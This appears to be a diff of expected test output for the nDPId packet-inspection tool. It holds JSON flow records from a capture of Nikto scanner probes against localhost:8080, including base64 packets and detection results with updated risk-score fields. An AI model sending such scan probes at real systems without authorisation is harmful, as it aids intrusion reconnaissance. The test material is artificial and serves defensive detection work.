 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":1,"flow_last_seen":1576420277480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":200,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":200,"pkt_l4_len":166,"ts_msec":1576420277480,"pkt":"AAAAAAAAAAAAAAAACABFAAC6N0ZAAEAGBPZ\/AAABfwAAAcWKH5D5Xg+fNMDiFYAYAED+rgAAAQEICp1m\/hCdZv4QR0VUIC92Mi9fY2F0YWxvZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/v2\/_catalog","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:)"}}
+01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/v2\/_catalog","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":1,"flow_last_seen":1576420277488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420277488,"pkt":"AAAAAAAAAAAAAAAACABFAADHoFdAAEAGm9d\/AAABfwAAAcWMH5DDZpiKMo58\/IAYAED+uwAAAQEICp1m\/hidZv4YR0VUIC9jZmFwcG1hbi9pbmRleC5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxMykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfappman\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000013)"}}
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfappman\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000013)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":1,"flow_last_seen":1576420277490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"ts_msec":1576420277490,"pkt":"AAAAAAAAAAAAAAAACABFAADZlJRAAEAGp4h\/AAABfwAAAcWOH5DTxKxPH2zSx4AYAED+zQAAAQEICp1m\/hqdZv4aR0VUIC9jZmRvY3MvZXhhbXBsZXMvY3ZiZWFucy9iZWFuaW5mby5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNCkNCg0K"}
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/cvbeans\/beaninfo.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000014)"}}
+01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/cvbeans\/beaninfo.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000014)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":1,"flow_last_seen":1576420277491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"ts_msec":1576420277491,"pkt":"AAAAAAAAAAAAAAAACABFAADVNLZAAEAGB2t\/AAABfwAAAcWQH5BQIAxp\/aIKGoAYAED+yQAAAQEICp1m\/hudZv4bR0VUIC9jZmRvY3MvZXhhbXBsZXMvcGFya3MvZGV0YWlsLmNmbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/parks\/detail.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000015)"}}
+01074{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/parks\/detail.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000015)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":1,"flow_last_seen":1576420277492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"ts_msec":1576420277492,"pkt":"AAAAAAAAAAAAAAAACABFAAC8BNZAAEAGN2R\/AAABfwAAAcWSH5DUDzwKrTgLpoAYAED+sAAAAQEICp1m\/hydZv4cR0VUIC9rYm9hcmQvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDE2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/kboard\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000016)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/kboard\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000016)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":1,"flow_last_seen":1576420277495,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277495,"pkt":"AAAAAAAAAAAAAAAACABFAADBe7BAAEAGwIR\/AAABfwAAAcWUH5BTWUN0U4buRIAYAED+tQAAAQEICp1m\/h6dZv4eR0VUIC9saXN0cy9hZG1pbi8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/lists\/admin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000017)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/lists\/admin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000017)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":1,"flow_last_seen":1576420277496,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420277496,"pkt":"AAAAAAAAAAAAAAAACABFAADEE4xAAEAGKKZ\/AAABfwAAAcWWH5AfSitVmmsDJoAYAED+uAAAAQEICp1m\/iCdZv4gR0VUIC9zcGxhc2hBZG1pbi5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxOCkNCg0K"}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/splashAdmin.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000018)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/splashAdmin.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000018)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":1,"flow_last_seen":1576420277497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"ts_msec":1576420277497,"pkt":"AAAAAAAAAAAAAAAACABFAAC8mG1AAEAGo8x\/AAABfwAAAcWYH5Bl4KC2nOMxboAYAED+sAAAAQEICp1m\/iGdZv4hR0VUIC9zc2RlZnMvIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDE5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ssdefs\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000019)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ssdefs\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000019)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
